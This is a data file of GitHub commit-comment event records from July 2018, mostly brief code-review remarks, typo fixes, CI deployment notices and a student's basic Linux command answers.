{"id":"7908065954","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29570004,"position":10,"line":10,"path":"discover/analytics-cloud/articles/04-analyzing-touchpoints/00-analytics-intro.markdown","commit_id":"adb329923f348e0095e0536119b1fb29734827e9","created_at":"2018-07-02T17:48:28Z","updated_at":"2018-07-02T17:48:28Z","author_association":"NONE","body":"typo: should be \"addition\""}},"created_at":"2018-07-02T17:48:28Z"}
{"id":"7908068884","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570009,"position":1,"line":1,"path":"src/app/contact/SECURITY.md","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:49:06Z","updated_at":"2018-07-02T17:49:06Z","author_association":"COLLABORATOR","body":"remove this file"}},"created_at":"2018-07-02T17:49:06Z"}
{"id":"7908074483","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570020,"position":17,"line":17,"path":"src/app/contact/contact.component.html","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:50:18Z","updated_at":"2018-07-02T17:50:18Z","author_association":"COLLABORATOR","body":"I think this `ng-selected=\"parmas.soption == 't.rate_name'\"` is useless. check it please"}},"created_at":"2018-07-02T17:50:18Z"}
{"id":"7908076190","type":"CommitCommentEvent","actor":{"login":"Thakur1190"},"repo":{"name":"Thakur1190/test"},"payload":{"comment":{"id":29570026,"position":null,"line":null,"path":null,"commit_id":"e6498a8bb93c3bafaf11784b8174c881ad30e56a","created_at":"2018-07-02T17:50:38Z","updated_at":"2018-07-02T17:50:38Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-02T17:50:38Z"}
{"id":"7908078105","type":"CommitCommentEvent","actor":{"login":"1RINGT"},"repo":{"name":"1RINGT/stk-code"},"payload":{"comment":{"id":29570031,"position":39,"line":104,"path":"src/items/powerup_manager.hpp","commit_id":"ea229b4e5ef5f4b739c0591b80040ac7929fa367","created_at":"2018-07-02T17:51:01Z","updated_at":"2018-07-02T17:51:01Z","author_association":"OWNER","body":"![2018-07-02 20 15 46](https://user-images.githubusercontent.com/40768467/42178564-98439cfe-7e39-11e8-8ecf-754bce0d4c73.jpg)\r\n"}},"created_at":"2018-07-02T17:51:01Z"}
{"id":"7908079955","type":"CommitCommentEvent","actor":{"login":"JustOff"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29570035,"position":null,"line":null,"path":null,"commit_id":"535e9399e6a57eafa478c26055339778f2b0c661","created_at":"2018-07-02T17:51:25Z","updated_at":"2018-07-02T17:51:25Z","author_association":"CONTRIBUTOR","body":"Tag #408."}},"created_at":"2018-07-02T17:51:25Z"}
{"id":"7908084821","type":"CommitCommentEvent","actor":{"login":"prodriguezdefino"},"repo":{"name":"prodriguezdefino/terraform-google-managed-instance-group"},"payload":{"comment":{"id":29570044,"position":null,"line":null,"path":null,"commit_id":"df6fdd3c850e9db65f31541cd8bdf67da1362599","created_at":"2018-07-02T17:52:30Z","updated_at":"2018-07-02T17:52:30Z","author_association":"OWNER","body":"It aim to improve resource tracking by enable labels on the underlying IT.  "}},"created_at":"2018-07-02T17:52:30Z"}
{"id":"7908085321","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570046,"position":34,"line":34,"path":"src/app/contact/contact.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:52:37Z","updated_at":"2018-07-02T17:52:37Z","author_association":"COLLABORATOR","body":"move properties declaration before methods declarations"}},"created_at":"2018-07-02T17:52:37Z"}
{"id":"7908085548","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29570048,"position":24,"line":24,"path":"discover/analytics-cloud/articles/04-analyzing-touchpoints/00-analytics-intro.markdown","commit_id":"adb329923f348e0095e0536119b1fb29734827e9","created_at":"2018-07-02T17:52:40Z","updated_at":"2018-07-02T17:52:40Z","author_association":"NONE","body":"Should be \"Touchpoints\""}},"created_at":"2018-07-02T17:52:40Z"}
{"id":"7908087204","type":"CommitCommentEvent","actor":{"login":"Behzadkk"},"repo":{"name":"Behzadkk/Behzadkk"},"payload":{"comment":{"id":29570052,"position":null,"line":null,"path":null,"commit_id":"52a37fdbbbdf11630c49f9b5018ff33f9f588f4d","created_at":"2018-07-02T17:53:03Z","updated_at":"2018-07-02T17:53:03Z","author_association":"OWNER","body":"css"}},"created_at":"2018-07-02T17:53:03Z"}
{"id":"7908089706","type":"CommitCommentEvent","actor":{"login":"sugyan84"},"repo":{"name":"sugyan84/REST"},"payload":{"comment":{"id":29570062,"position":17,"line":17,"path":"Messenger/src/main/java/com/webservice/filterBean/ContextFilterBean.java","commit_id":"a8da6e59b33e348d2d307af18f3538e1ca936825","created_at":"2018-07-02T17:53:35Z","updated_at":"2018-07-02T17:53:35Z","author_association":"OWNER","body":"haha"}},"created_at":"2018-07-02T17:53:35Z"}
{"id":"7908089807","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570063,"position":53,"line":53,"path":"src/app/contact/contact.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:53:36Z","updated_at":"2018-07-02T17:53:36Z","author_association":"COLLABORATOR","body":"remove `<HTMLFormElement>`"}},"created_at":"2018-07-02T17:53:36Z"}
{"id":"7908094165","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570077,"position":69,"line":69,"path":"src/app/contact/contact.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:54:35Z","updated_at":"2018-07-02T17:54:35Z","author_association":"COLLABORATOR","body":"this return is used anywhere? if it's not, remove it please"}},"created_at":"2018-07-02T17:54:35Z"}
{"id":"7908095876","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29570081,"position":5,"line":32,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T17:54:58Z","updated_at":"2018-07-02T17:54:58Z","author_association":"COLLABORATOR","body":"They will be redundant to compiler, but not to human"}},"created_at":"2018-07-02T17:54:58Z"}
{"id":"7908096913","type":"CommitCommentEvent","actor":{"login":"coa2769"},"repo":{"name":"coa2769/web01"},"payload":{"comment":{"id":29570084,"position":4,"line":11,"path":"HTML_study.html","commit_id":"040db1457525cbb4be13c54aaa303a52ad1e530f","created_at":"2018-07-02T17:55:11Z","updated_at":"2018-07-02T17:55:11Z","author_association":"OWNER","body":"<li><a hre"}},"created_at":"2018-07-02T17:55:11Z"}
{"id":"7908098554","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570090,"position":74,"line":74,"path":"src/app/contact/contact.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:55:30Z","updated_at":"2018-07-02T17:55:30Z","author_association":"COLLABORATOR","body":"move all these kind of backend endpoints to a config file"}},"created_at":"2018-07-02T17:55:30Z"}
{"id":"7908100699","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570100,"position":2,"line":2,"path":"src/app/events/events.component.html","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:55:58Z","updated_at":"2018-07-02T17:55:58Z","author_association":"COLLABORATOR","body":"template to be adjusted"}},"created_at":"2018-07-02T17:55:58Z"}
{"id":"7908102346","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29570104,"position":18,"line":43,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T17:56:20Z","updated_at":"2018-07-02T17:56:20Z","author_association":"COLLABORATOR","body":"https://github.com/stratisproject/StratisBitcoinFullNode/blob/master/Documentation/coding-style.md \r\nrule 18"}},"created_at":"2018-07-02T17:56:20Z"}
{"id":"7908103500","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29570107,"position":5,"line":32,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T17:56:36Z","updated_at":"2018-07-02T17:56:36Z","author_association":"COLLABORATOR","body":"https://github.com/stratisproject/StratisBitcoinFullNode/blob/master/Documentation/coding-style.md\r\nrule 23"}},"created_at":"2018-07-02T17:56:36Z"}
{"id":"7908104225","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29570109,"position":11,"line":11,"path":"src/app/features/features.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:56:46Z","updated_at":"2018-07-02T17:56:46Z","author_association":"COLLABORATOR","body":"initialize of use ngIf in template"}},"created_at":"2018-07-02T17:56:46Z"}
{"id":"7908104407","type":"CommitCommentEvent","actor":{"login":"iwolterstorff"},"repo":{"name":"iwolterstorff/dotfiles"},"payload":{"comment":{"id":29570110,"position":8,"line":8,"path":"scripts/bin/launch_polybar.sh","commit_id":"1048bd6d8e4b0f2252bc839928d1e02059ec3217","created_at":"2018-07-02T17:56:47Z","updated_at":"2018-07-02T17:56:47Z","author_association":"OWNER","body":"Kyle Walker? Kyle MacLachlan? Kyle from South Park!"}},"created_at":"2018-07-02T17:56:47Z"}
{"id":"7908108538","type":"CommitCommentEvent","actor":{"login":"aykamko"},"repo":{"name":"crowd-ai/activerecord-mysql2rgeo-adapter"},"payload":{"comment":{"id":29570115,"position":null,"line":null,"path":null,"commit_id":"4a4e4348714d7d67dc3dae7a40dd7728d45ae67c","created_at":"2018-07-02T17:57:43Z","updated_at":"2018-07-02T17:57:43Z","author_association":"NONE","body":"will do"}},"created_at":"2018-07-02T17:57:43Z"}
{"id":"7908108757","type":"CommitCommentEvent","actor":{"login":"2mol"},"repo":{"name":"2mol/pboy"},"payload":{"comment":{"id":29570117,"position":null,"line":null,"path":null,"commit_id":"809d9e9081ec433f5ce87aec4ecc0c7a4f3ed1fb","created_at":"2018-07-02T17:57:46Z","updated_at":"2018-07-02T17:57:46Z","author_association":"OWNER","body":"closes #5 "}},"created_at":"2018-07-02T17:57:46Z"}
{"id":"7908110597","type":"CommitCommentEvent","actor":{"login":"ElektroKill"},"repo":{"name":"ElektroKill/FogiveMe-Trojan"},"payload":{"comment":{"id":29570122,"position":null,"line":null,"path":null,"commit_id":"a3c82070e50ee62ca0b8980bed0f8f147578a361","created_at":"2018-07-02T17:58:11Z","updated_at":"2018-07-02T17:58:11Z","author_association":"OWNER","body":"probably dosen't work"}},"created_at":"2018-07-02T17:58:11Z"}
{"id":"7908112222","type":"CommitCommentEvent","actor":{"login":"goxr3plus"},"repo":{"name":"goxr3plus/JavaFX-Web-Browser"},"payload":{"comment":{"id":29570124,"position":null,"line":null,"path":null,"commit_id":"d89a8b43709fefe4575c1416d6de36ddd6502992","created_at":"2018-07-02T17:58:33Z","updated_at":"2018-07-02T17:58:33Z","author_association":"OWNER","body":"It is a special annotation for fxml. Check in the web JavaFX Tutorials. :)\n\nOn Mon, Jul 2, 2018, 17:31 PAVAN <notifications@github.com> wrote:\n\n> thanks bro ..but you used @FXML Annotation in project what is the\n> meaning of that\n>\n> On Sun, Jul 1, 2018 at 12:56 AM, GOXR3PLUS STUDIO <\n> notifications@github.com>\n> wrote:\n>\n> > Ou plain JavaFX, no extra frameworks :)\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/goxr3plus/JavaFX-Web-Browser/commit/d89a8b43709fefe4575c1416d6de36ddd6502992#commitcomment-29555236\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/Ai-UZSe4b6r74mNUIYBQrqXv_gNd7Uawks5uB9D6gaJpZM4UAu01\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/goxr3plus/JavaFX-Web-Browser/commit/d89a8b43709fefe4575c1416d6de36ddd6502992#commitcomment-29567550>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATbiwJ3bXaoZKoP09edl7fg_mh6x8kY0ks5uCi69gaJpZM4UAu01>\n> .\n>\n"}},"created_at":"2018-07-02T17:58:33Z"}
{"id":"7908112521","type":"CommitCommentEvent","actor":{"login":"eduaddad"},"repo":{"name":"eduaddad/ZeroMail"},"payload":{"comment":{"id":29570127,"position":null,"line":null,"path":null,"commit_id":"3093ddf376099bbf603cb3d1a7cd5497da7657b8","created_at":"2018-07-02T17:58:37Z","updated_at":"2018-07-02T17:58:37Z","author_association":"OWNER","body":"add portuguese portuguese language"}},"created_at":"2018-07-02T17:58:37Z"}
{"id":"7908115541","type":"CommitCommentEvent","actor":{"login":"sabrehagen"},"repo":{"name":"stemn/stemn-pipeline-containers"},"payload":{"comment":{"id":29570130,"position":null,"line":null,"path":null,"commit_id":"59a1e82da364940300a1c6062517cba31e454d64","created_at":"2018-07-02T17:59:16Z","updated_at":"2018-07-02T17:59:16Z","author_association":"MEMBER","body":"We're using [esModuleInterop](https://github.com/stemn/stemn-pipeline-containers/blob/0212221c085b9c4d1fdf7444ec795d899d9314ab/email/tsconfig.json#L3)"}},"created_at":"2018-07-02T17:59:16Z"}
{"id":"7908121507","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29570147,"position":null,"line":null,"path":null,"commit_id":"5f9592e4ff7e7c1eb01831b257c011c767f337c7","created_at":"2018-07-02T18:00:34Z","updated_at":"2018-07-02T18:00:34Z","author_association":"NONE","body":"Does script go to zones with max level? I have an old version, and it farms 600xp, while there is 2400 xp. I'm not max level."}},"created_at":"2018-07-02T18:00:34Z"}
{"id":"7908123128","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29570153,"position":249,"line":197,"path":"discover/analytics-cloud/articles/04-analyzing-touchpoints/01-page-analytics.markdown","commit_id":"c9435bc8490308cfc4333108e8b40c291e88fafa","created_at":"2018-07-02T18:00:54Z","updated_at":"2018-07-02T18:00:54Z","author_association":"NONE","body":"\"the\""}},"created_at":"2018-07-02T18:00:54Z"}
{"id":"7908123901","type":"CommitCommentEvent","actor":{"login":"dorothee-reinhard"},"repo":{"name":"dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996"},"payload":{"comment":{"id":29570155,"position":null,"line":null,"path":null,"commit_id":"7658e6eca1d558c394b39f2f01de228a81daccc5","created_at":"2018-07-02T18:01:04Z","updated_at":"2018-07-02T18:01:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9b500bcd-bbc5-426d-af33-ded21a77a910?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180620184046996\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/46be8e2f-80f6-4609-a8ac-8400cf1a122e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180620184046996\") deployed [sample-cloud-native-toolchain-tutorial-20180620184046996](https://github.com/dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996/releases/tag/deploy-ibm-yp-us-south-IBM_ZH-test-20180702-180102 \"deploy-ibm-yp-us-south-IBM_ZH-test-20180702-180102\") to [test](https://console.bluemix.net/apps/4e59c5c6-74cc-48fd-b7c9-f088c562cbc6?env_id=ibm:yp:us-south \"ibm:yp:us-south:IBM_ZH:test\"), including this commit"}},"created_at":"2018-07-02T18:01:04Z"}
{"id":"7908123951","type":"CommitCommentEvent","actor":{"login":"kaspth"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29570156,"position":14,"line":228,"path":"activemodel/lib/active_model/dirty.rb","commit_id":"136fc65c9b8b66e1fb56f3a17f0d1fddff9b4bd0","created_at":"2018-07-02T18:01:04Z","updated_at":"2018-07-02T18:01:04Z","author_association":"MEMBER","body":"@claudiob why not try it in a PR and see if the tests fail? 😄"}},"created_at":"2018-07-02T18:01:04Z"}
{"id":"7908126019","type":"CommitCommentEvent","actor":{"login":"galibert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29570163,"position":108,"line":535,"path":"src/mame/drivers/ps2sony.cpp","commit_id":"9d60df7b06298e6285fb2ef8d5d4b3d1f8cb89cd","created_at":"2018-07-02T18:01:29Z","updated_at":"2018-07-02T18:01:29Z","author_association":"MEMBER","body":"static const char *const mode_strings please.\r\n\r\n  OG,\r\n"}},"created_at":"2018-07-02T18:01:29Z"}
{"id":"7908134805","type":"CommitCommentEvent","actor":{"login":"aparnakamala"},"repo":{"name":"premalatha-nair/DevOps"},"payload":{"comment":{"id":29570174,"position":null,"line":null,"path":null,"commit_id":"2b329f7a2c8bee9bc31796698b6286ccbf77f8d7","created_at":"2018-07-02T18:03:27Z","updated_at":"2018-07-02T18:03:27Z","author_association":"NONE","body":"Answers\r\n\r\n1 A) command : mkdir Devops\r\n\r\n2 A) command:  cd Devops\r\n                          touch LinuxCommands.c\r\n \r\n\r\n3 A)  command:       pwd\r\n                              /home/aparna/Devops\r\n\r\n4.A)\t command:   cd\r\n                             mkdir    LinuxOS\r\n\r\n5.A)\t  command:  cd  LinuxOS\r\n                              touch About.txt\r\n \r\n\r\n6.A)   command : mv LinuxOS Linux\r\n\r\n7.A) pwd /Linux  \r\n\r\n\r\n8. A)\tCommand :cd \r\n                          cd Devops\r\n                           touch about.txt\r\n          \r\n9. A) Command:  ls\r\n                            about.txt   LinuxCommands.c\r\n  \r\n10.A)Command :\t \r\n                         cp /home/aparna/Devops/about.txt /home/aparna/Linux/devops.txt\r\n                          cd Linux\r\n                            ls\r\n                          About.txt   devops.txt\r\n"}},"created_at":"2018-07-02T18:03:27Z"}
{"id":"7908138163","type":"CommitCommentEvent","actor":{"login":"dorothee-reinhard"},"repo":{"name":"dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996"},"payload":{"comment":{"id":29570180,"position":null,"line":null,"path":null,"commit_id":"7658e6eca1d558c394b39f2f01de228a81daccc5","created_at":"2018-07-02T18:04:13Z","updated_at":"2018-07-02T18:04:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9b500bcd-bbc5-426d-af33-ded21a77a910?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180620184046996\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/46be8e2f-80f6-4609-a8ac-8400cf1a122e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180620184046996\") deployed [sample-cloud-native-toolchain-tutorial-20180620184046996](https://github.com/dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996/releases/tag/deploy-ibm-yp-us-south-IBM_ZH-prod-20180702-180413 \"deploy-ibm-yp-us-south-IBM_ZH-prod-20180702-180413\") to [prod](https://console.bluemix.net/apps/cea9185a-54aa-4917-b30b-f8049b9c5757?env_id=ibm:yp:us-south \"ibm:yp:us-south:IBM_ZH:prod\"), including this commit"}},"created_at":"2018-07-02T18:04:13Z"}
{"id":"7908141637","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29570187,"position":null,"line":null,"path":null,"commit_id":"7f612a95b202197e66e519b00fa8c1f5535e2830","created_at":"2018-07-02T18:05:03Z","updated_at":"2018-07-02T18:05:03Z","author_association":"NONE","body":"So one worry about this idea: attackedby2 does not REALLY mean it is attacked by 2. It means attacked by at least 2. So here we could penalize a piece attacked twice, but defended 4 times. \r\nBut maybe that is still worth penalizing. \r\n\r\nAlso, as a new idea here, you could make a second term, ThreatOverloadPieces2, and try a greater and less penalty."}},"created_at":"2018-07-02T18:05:03Z"}
{"id":"7908142668","type":"CommitCommentEvent","actor":{"login":"botimer"},"repo":{"name":"mlibrary/dromedary"},"payload":{"comment":{"id":29570190,"position":7,"line":6,"path":"app/views/shared/_footer.html.erb","commit_id":"f5a01dec97be979edc2122dc769e155ab5d1c564","created_at":"2018-07-02T18:05:16Z","updated_at":"2018-07-02T18:05:16Z","author_association":"MEMBER","body":"This is bugged when using a relative root. I think it should  use `<%= link_to 'Middle English Dictionary', dictionary_path %>`, right? Similar for the bib link.\r\n\r\nI would also consider a locale file for these labels that occur in lots of places to cut down on typo risk."}},"created_at":"2018-07-02T18:05:16Z"}
{"id":"7908147702","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29570197,"position":null,"line":null,"path":null,"commit_id":"f1181616d0f6e3071873c9fba667314b0ede9c1c","created_at":"2018-07-02T18:06:21Z","updated_at":"2018-07-02T18:06:21Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-02T18:06:21Z"}
{"id":"7908148905","type":"CommitCommentEvent","actor":{"login":"alisonjo2786"},"repo":{"name":"CU-CommunityApps/gold-bear"},"payload":{"comment":{"id":29570201,"position":null,"line":null,"path":null,"commit_id":"0d2b0caf660aa3eb2206ef3aea716e0ca01aa6bc","created_at":"2018-07-02T18:06:37Z","updated_at":"2018-07-02T18:06:37Z","author_association":"MEMBER","body":"Created multidev environment [gold-bear#ci-64](https://dashboard.pantheon.io/sites/b405a672-5bc8-475a-9593-90a1d3a16358#ci-64).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-64-gold-bear.pantheonsite.io/)"}},"created_at":"2018-07-02T18:06:37Z"}
{"id":"7908152745","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29570207,"position":45,"line":45,"path":"tests/vcs/git/GitMergeInspectBearTest.py","commit_id":"f9938423df8ed67660bb77a1b301fa5940fe4e24","created_at":"2018-07-02T18:07:32Z","updated_at":"2018-07-02T18:07:32Z","author_association":"NONE","body":"Where is the `tearDown()`? it's needed to reset the test to its default state, e.g deleting the files that have been created by a test method"}},"created_at":"2018-07-02T18:07:32Z"}
{"id":"7908154929","type":"CommitCommentEvent","actor":{"login":"devhell"},"repo":{"name":"openlab-aux/vuizvui"},"payload":{"comment":{"id":29570211,"position":null,"line":null,"path":null,"commit_id":"21118154c9a5c94ae701f88ac20743e8c3c2d539","created_at":"2018-07-02T18:08:02Z","updated_at":"2018-07-02T18:08:02Z","author_association":"COLLABORATOR","body":"I noticed later and reverted. Easy to miss. Sorry."}},"created_at":"2018-07-02T18:08:02Z"}
{"id":"7908162404","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570226,"position":18,"line":39,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:09:44Z","updated_at":"2018-07-02T18:09:44Z","author_association":"COLLABORATOR","body":"Скелет в шкафу... Удалил"}},"created_at":"2018-07-02T18:09:44Z"}
{"id":"7908163689","type":"CommitCommentEvent","actor":{"login":"Spl3en"},"repo":{"name":"icon-project/icon_sdk_for_python"},"payload":{"comment":{"id":29570230,"position":134,"line":451,"path":"icx/utils.py","commit_id":"1bf96e1d4c0c987a0058e9f40b9fb137f62a46e6","created_at":"2018-07-02T18:10:02Z","updated_at":"2018-07-02T18:10:02Z","author_association":"NONE","body":"get_balance_after_trasfer should be get_balance_after_tra**n**sfer"}},"created_at":"2018-07-02T18:10:02Z"}
{"id":"7908168915","type":"CommitCommentEvent","actor":{"login":"scolby33"},"repo":{"name":"scolby33/OCSPdash"},"payload":{"comment":{"id":29570242,"position":7,"line":52,"path":"src/ocspdash/ocspscrape.py","commit_id":"89715290b0757a6d20fef932ef0b4a585bea6e78","created_at":"2018-07-02T18:11:15Z","updated_at":"2018-07-02T18:11:15Z","author_association":"OWNER","body":"I thought about that. My sorta intention on the API versioning front is that each version is a different blueprint and so we can have multiple in production at a time, at /api/v0/, /api/v1/, etc. if necessary.\r\n\r\nThen, each version of ocspscrape would be made for one version of the API?\r\n\r\nMaybe this is thinking too much about compatibility at this point..."}},"created_at":"2018-07-02T18:11:15Z"}
{"id":"7908171275","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29570246,"position":51,"line":33,"path":"discover/analytics-cloud/articles/04-analyzing-touchpoints/04-forms-analytics.markdown","commit_id":"adb329923f348e0095e0536119b1fb29734827e9","created_at":"2018-07-02T18:11:48Z","updated_at":"2018-07-02T18:11:48Z","author_association":"NONE","body":"\"that's\""}},"created_at":"2018-07-02T18:11:48Z"}
{"id":"7908174353","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29570260,"position":null,"line":null,"path":null,"commit_id":"35671d583c314cdbd373673252ba4f8a6efc0d45","created_at":"2018-07-02T18:12:29Z","updated_at":"2018-07-02T18:12:29Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-02T18:12:29Z"}
{"id":"7908177106","type":"CommitCommentEvent","actor":{"login":"MarshalX"},"repo":{"name":"Testrcd/SalienSnake"},"payload":{"comment":{"id":29570264,"position":null,"line":null,"path":null,"commit_id":"1c832799c281a0eee4aeac6ae9c60bb9fc053be7","created_at":"2018-07-02T18:13:06Z","updated_at":"2018-07-02T18:13:06Z","author_association":"NONE","body":"Everyone sees your token. They can use it and stop you from getting experience... Make the repository private"}},"created_at":"2018-07-02T18:13:06Z"}
{"id":"7908179226","type":"CommitCommentEvent","actor":{"login":"jhinkey"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29570267,"position":123,"line":100,"path":"discover/analytics-cloud/articles/04-analyzing-touchpoints/04-forms-analytics.markdown","commit_id":"adb329923f348e0095e0536119b1fb29734827e9","created_at":"2018-07-02T18:13:36Z","updated_at":"2018-07-02T18:13:36Z","author_association":"NONE","body":"Replace \"borwsers\" with \"browsers\""}},"created_at":"2018-07-02T18:13:36Z"}
{"id":"7908179946","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-server"},"payload":{"comment":{"id":29570270,"position":null,"line":null,"path":null,"commit_id":"c67112a9d1d56f674e9f47b377490a273c64119e","created_at":"2018-07-02T18:13:46Z","updated_at":"2018-07-02T18:13:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tickets API](https://trello.com/c/gT8oBPxA/1-tickets-api)"}},"created_at":"2018-07-02T18:13:46Z"}
{"id":"7908184672","type":"CommitCommentEvent","actor":{"login":"narayanad"},"repo":{"name":"jmtucker7/JavaScript_Solutions"},"payload":{"comment":{"id":29570278,"position":null,"line":null,"path":null,"commit_id":"fde3ea864f651433f8b37742a25e7843725e8766","created_at":"2018-07-02T18:14:51Z","updated_at":"2018-07-02T18:14:51Z","author_association":"NONE","body":"can u write this code into java\r\n"}},"created_at":"2018-07-02T18:14:51Z"}
{"id":"7908189572","type":"CommitCommentEvent","actor":{"login":"NikolajBjorner"},"repo":{"name":"Z3Prover/z3"},"payload":{"comment":{"id":29570290,"position":76,"line":172,"path":"src/tactic/core/reduce_invertible_tactic.cpp","commit_id":"a73d0303212d47b10d1740f8b41d74feb906113f","created_at":"2018-07-02T18:15:57Z","updated_at":"2018-07-02T18:15:57Z","author_association":"CONTRIBUTOR","body":"could still be null when v is a bound variable. \r\nis_invertible could be called with bound variables have multiple parents."}},"created_at":"2018-07-02T18:15:57Z"}
